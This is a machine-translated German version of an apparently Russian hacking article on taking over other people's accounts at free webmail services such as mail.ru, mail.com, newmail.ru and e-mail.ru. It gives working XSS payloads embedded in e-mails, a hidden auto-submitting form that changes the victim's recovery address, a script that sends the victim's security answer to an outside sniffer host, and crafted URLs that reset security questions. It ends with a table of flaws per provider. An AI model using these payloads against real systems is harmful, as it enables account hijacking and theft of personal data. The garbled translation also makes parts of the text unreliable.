This page has been robot translated, sorry for typos if any. Original content here.

ÜBERSICHT ÜBER DIE VERLETZUNG FREIER POSTLEISTUNGEN

Wir beschäftigen uns weiterhin mit Web-Mail. Ich habe eine kleine Studie mit verschiedenen Diensten zum Hacking durchgeführt und dir die Ergebnisse vorgestellt. Die Technologie des Angriffs bleibt gleich: Eine E-Mail mit einem JavaScript-Code, der an die Adresse einer anderen Person gesendet wird, wird gesendet, was beim Öffnen der Nachricht funktioniert und einige Informationen in den Einstellungen der Benutzerbox ändert. Es macht keinen Sinn, jeden Server im Detail zu beschreiben, da der Ansatz überall gleich ist, also werde ich einige Beispiele nennen und am Ende eine Tabelle. In den meisten Fällen kann Hacken als 100% angesehen werden, wobei einige Annahmen gelten: Der Benutzer muss das Webinterface zum Lesen von Briefen verwenden. Beim Schreiben von Exploits wurde ich von einer Standardplattform geleitet, dh ich gehe davon aus, dass der Benutzer kein exotisches OS oder Browser mit deaktivierter JS-Ausführung.

WWW.MAIL.RU

Ich beginne mit der Post Nummer 1 in Russland. Im Moment, durch das Überspringen von JavaScript und einem Entwicklerfehler, kann diese Box durchbrochen werden. Ich glaube, dass die Grundprinzipien bekannt sind. Wie bekomme ich ein Passwort? 1 - um es nicht autorisiert zu ändern. Pass nicht auf, du musst das vorher Erreichte kennen. 2 - die geheime Frage zu ändern und den Dienst zur Bekämpfung von Amnesie zu nutzen. Auch wird nicht funktionieren. 3 - richten Sie Ihre alternative E-Mail ein, um das vom System generierte neue Passwort zu erhalten. Es funktioniert nicht, die letzten beiden Optionen oben sind in der gleichen Form und sind auch durch ein Passwort geschützt. Auch der Rest, der für uns weniger Interessenseinstellungen (Name, Nachname, etc.) darstellt, ohne das aktuelle Passwort einzugeben, kann sich nicht ändern. Es scheint, dass es keine Optionen gibt. Es gibt jedoch einen solchen sekundären, unauffälligen Abschnitt der "Kontaktinformationen" Einstellungen (ICQ, Website, Telefon, Arbeitsplatz, Zeitzone usw.). In diesem Abschnitt können Sie auch eine Kontakt-E-Mail angeben. Der Trick besteht darin, dass gleichzeitig in der Registrierungsinformation die alternative Adresse geändert wird, aber die im Fragebogen eingetragen ist. Nun können Sie über den Erinnerungsdienst ein Passwort für Seife erhalten. Es ist einfach. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Wahrheit der GET-Methode ist, dass die Einstellungen in der Mail.ru-Box jetzt nicht mehr geändert werden können. Daher werde ich die technische Seite der Frage im Detail beschreiben.

I. Wir senden an die gewünschte Box einen Brief mit einem Code, der direkt im Text der Nachricht einen Rahmen mit einem Link zu unserer Seite erzeugt. Wenn möglich, sollte das Skript ohne Benutzereingaben funktionieren (Klicken, Klicken, Mouseover, Bild-Upload, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.yourdomain.com/yourscript.html> </ iframe>'; this.wav">
 <p id = 'xxx'>
Um die Funktionalität des Skripts sowie Verkleidung vollständig zu gewährleisten, konvertieren wir:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). internHTML = 'iframe src = http: //yoursite.com/yourscript.html width = 0 height = 0> </ iframe> ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In dieser Form ersetzen die Zeichencodes die Buchstaben im Namen der Javascript- und Iframe-Elemente und das Mail-Skript filtert sie nicht. Die Status = Ortszeile; Erstellt die Sichtbarkeit der lokalen URL in der Statusleiste, so dass kein externes Flimmern Verdacht weckt. Die Breiten- und Höhenattribute sowohl des Rahmens als auch des Einbands werden auf Null gesetzt und sie unsichtbar gemacht.

II. Auf der Ressource http://yoursite.ru haben wir ein HTML-Dokument mit einem Formular zum Senden der geänderten Daten an den mail.ru Server.

Der Inhalt von yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "Seite" value = "2"> <br>
 <input type = "hidden" name = "E-Mail" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Speichern" name = "Speichern"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Hinweise: Die Arbeit des Client-Teils des Skripts in unveränderter Form ist nur für IE garantiert; Die Form des Sendens wird auf einer separaten Seite veröffentlicht, um den Brief "zu entladen".


WWW.MAIL.COM

Ein etwas anderer Sicherheitsfehler, zum Beispiel http://mail.com. Wenn Sie den Passwort-Erinnerungsdienst verwenden, müssen Sie nur die richtige Antwort auf die geheime Frage eingeben (eine der Optionen). Also haben wir uns die Aufgabe gestellt, diese Antwort zu bekommen. Dies ist leicht erledigt. Als ich die Eigenschaften des Postfachs betrachtete und die Registrierungsinformationen durchblätterte, sah ich, dass die Antwort auf die geheime Frage nicht versteckt ist, was uns erlaubt, JavaScript zu verwenden, um seinen Wert zu ermitteln.

Wir implementieren das Skript über das Style- Tag.
Adresse der Seite mit den Einstellungen: http://mail01.mail.com/scripts/common/genprofile.cgi
Formularname: Profilformular
Der Name des Textfeldes mit einer geheimen Antwort: hint_a
Um eine geheime Frage zu stehlen, müssen Sie am Ende die Einstellungsseite aufrufen, JavaScript ausführen, den Wert von document.profileform.hint_a.value abrufen und zusammen mit der Umgebungsvariablen REQUEST_UR I an den Sniffer übergeben .

Fertige Version:
 <style> @import url (javascript: document.getElementById (out)) innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'null'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = path + str`> </ iframe> ); </ style>
 <span id = 'out'> </ span>
Im generierten Frame mit dem Namen Null wird die Einstellungsseite geladen. Am Ende des Downloads startet der OnLoad-Handler das Skript zum Lesen der geheimen Frage und sendet dann durch den gleichen Frame eine Antwort an den Sniffer. Jetzt reicht es, auf http://zero.h12.ru/stat/log.php zu gehen und die notwendigen Informationen in der Zeile "Host" zu finden .

WWW.NEWMAIL.RU

Meiner Meinung nach ein ziemlich beliebter Briefträger, also werde ich Ihnen im Detail darüber berichten. Darüber hinaus ist es viel einfacher, die Rechnung eines anderen in Besitz zu nehmen, als es auf den ersten Blick scheint. Sie können dies tun: Senden Sie eine Nachricht mit einem Skript, das die Sitzungs-ID beim Start empfängt, die erforderlichen Abfragen erzeugt und die Einstellungen der altrenativen E-Mail (an die das Passwort anschließend gesendet wird) und die geheime Frage und Antwort ändern. Wenn Sie jedoch eine andere Adresse mit einer Erinnerung angeben, wird das Passwort an sie gesendet, solange die geheime Antwort korrekt ist. Und die folgende Beobachtung: Die Sitzungs-ID zum Ändern der Einstellungen kann überhaupt nicht verwendet werden. Außerdem sind alle Tags erlaubt. Das alles reduziert die Menge an Code auf ein paar Zeilen:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = FRAGE & cp_answ = ANTWORT width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

Die Methode des Hackens von e-mail.ru passt etwas nicht in das allgemeine Thema des Artikels, sondern immer noch - Mail :) . Als ich aus einer Box ein Passwort bekommen musste, registrierte ich wie gewohnt mein Konto und begann, das System zu untersuchen. Das erste, was mir aufgefallen ist, war die Fähigkeit, ein neues Passwort und eine geheime Frage mit einer Antwort zu setzen, ohne das alte Passwort einzugeben. Der übliche Aktionsplan besteht darin, die Filterung von Tags zu überprüfen, die ID abzurufen und die Abfrage auszuführen. Um jedoch die verwendeten Einstellungen zu ändern, wird eine spezielle Variable utoken verwendet, die im Hauptteil des Dokuments enthalten ist. Nach dem Experimentieren mit der Änderung der Frage und der Antwort mit dem vorher bekannten utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Ich bin gekommen, um die Schlussfolgerung, dass ID und Cookies zum Ändern der Einstellungen nicht erforderlich sind. In diesem Fall wurde nach der Überwachung von "utoken" festgestellt, dass die vierstellige Hexadezimalzahl nach der E-Mail-Adresse email@e-mail.ru-5a00 in einem sehr engen Bereich liegt. Um eine geheime Frage mit der Antwort auf jede interessierende Box zu erstellen , müssen Sie nur 7 Optionen durchgehen : 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Wenn die Nummer erraten wird, gelangen wir in die gewünschte Box.

Hinweise: Im Moment gab es einige Änderungen. Der Passwortwiederherstellungsdienst funktioniert nicht. Es ist daher ratsam, ihn sofort zu ändern. Die Adresse der Konfigurationsänderung hat sich ebenfalls geändert:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Die Methode funktioniert nicht für immer. Wahrscheinlich, immerhin ist es erforderlich, dass der Benutzer von Zeit zu Zeit in die Post durch das Internet gehen .

Tabelle mit Eigenschaften von freien WWW-Servern

SERVER JavaScript VERLETZUNG
www.km.ru
km.ru
img src = javascript: Ermöglicht das Lesen des Passworts auf der Einstellungsseite aus dem Passwortfeld
www.mail.ru
inbox.ru , bk.ru , list.ru ,
embed src = javascript: Sie können eine alternative E-Mail ändern
www.mail.com
email.com , post.com , myself.com , consultant.com und anderen.
@ import url (javascript :); Die Einstellungen zeigen die Antwort auf die Sicherheitsfrage
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
In irgendeiner Weise Lesen / ändern Sie die Frage und antworten Sie. Das Passwort ist gültig
www.netman.ru und www.mailgate.ru
der gleiche Briefträger. ungefähr 80 Domänen
img src = javascript :, style = Hintergrund: url (javascript :) Sie können eine Antwort auf eine geheime Frage klauen, wenn sie installiert ist. Es ist auch möglich, die Adresse für die Weiterleitung einzustellen (Kopien werden nicht gespeichert)
www.yandex.ru OnError, OnLoad Entfernen der Website * .narod.ru (JS ist nicht erforderlich)
www.ukr.net embed src = javasc
ript: das .wav>
Lesen Sie die Antwort auf Ihre Sicherheitsfrage
www.nextmail.ru
xaker.ru , email.su , russisch.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Ändere die Antwort auf deine Sicherheitsfrage
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru und andere.
In vielerlei Hinsicht Konto löschen
www.rin.ru embed src = javascript: Lesen Sie die geheime Antwort